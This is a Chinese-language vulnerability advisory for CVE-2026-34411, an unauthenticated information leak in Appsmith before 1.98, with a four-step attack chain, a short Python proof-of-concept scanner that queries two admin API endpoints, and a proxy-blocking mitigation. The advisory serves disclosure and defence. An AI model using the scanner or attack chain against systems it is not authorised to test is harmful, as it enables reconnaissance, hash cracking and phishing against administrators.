CVE-2026-34411 CVSS 5.3 中危

CVE-2026-34411 Appsmith敏感信息泄露漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34411

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Appsmith

漏洞概述

Appsmith 1.98之前的版本存在安全漏洞，由于未对敏感的实例管理API端点进行身份验证保护，导致未经身份验证的攻击者可以访问特定接口。攻击者利用该漏洞可获取配置元数据、许可证信息以及管理员邮箱域的未加盐SHA-256哈希值。这些信息可用于侦察并为后续的针对性攻击做准备，对系统安全构成潜在威胁。

技术细节

该漏洞的根本原因在于Appsmith在1.98版本之前，未能正确限制对特定管理API端点的访问权限。具体而言，`/api/v1/consolidated-api/view`和`/api/v1/tenants/current`这两个关键接口缺乏必要的身份验证检查。攻击者无需提供任何凭证，即可直接向这些端点发送HTTP GET请求。服务器在收到请求后，会直接返回敏感数据。泄露的数据中包含管理员电子邮件域的未加盐SHA-256哈希值。由于哈希未加盐，攻击者可以通过彩虹表或字典攻击的方式破解这些哈希，从而推断出管理员的邮箱域名，进而辅助进行钓鱼攻击或账号暴力破解。整个攻击过程无需用户交互，利用难度低。

攻击链分析

STEP 1

1. 信息搜集

攻击者扫描网络或通过搜索引擎发现暴露在互联网上的Appsmith实例。

STEP 2

2. 发送未认证请求

攻击者向目标服务器发送未携带身份验证凭证的HTTP GET请求至 `/api/v1/consolidated-api/view` 或 `/api/v1/tenants/current` 端点。

STEP 3

3. 获取敏感数据

由于服务器未校验权限，直接返回JSON格式的配置元数据、许可证信息及管理员邮箱域的哈希值。

STEP 4

4. 后渗透利用

攻击者分析获取到的哈希值（尝试破解未加盐的SHA-256）和配置信息，为下一步的精准钓鱼攻击或暴力破解做准备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_base_url):
    """
    Checks if the target Appsmith instance is vulnerable to CVE-2026-34411.
    Attempts to access sensitive management endpoints without authentication.
    """
    vulnerable_endpoints = [
        "/api/v1/consolidated-api/view",
        "/api/v1/tenants/current"
    ]
    
    headers = {
        "User-Agent": "CVE-2026-34411-Scanner/1.0"
    }

    print(f"[+] Checking target: {target_base_url}")

    for endpoint in vulnerable_endpoints:
        url = f"{target_base_url.rstrip('/')}{endpoint}"
        try:
            response = requests.get(url, headers=headers, timeout=10)
            if response.status_code == 200:
                print(f"[!] VULNERABLE: Sensitive data disclosed at {url}")
                print(f"    Response Preview: {response.text[:200]}...")
            else:
                print(f"[-] Status {response.status_code} for {url}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {url}: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:80"
    check_vulnerability(target)

影响范围

Appsmith < 1.98

防御指南

临时缓解措施

如果无法立即升级，建议在WAF或反向代理（如Nginx）上配置规则，拦截对 `/api/v1/consolidated-api/view` 和 `/api/v1/tenants/current` 路径的外部访问请求，仅允许内网维护IP访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表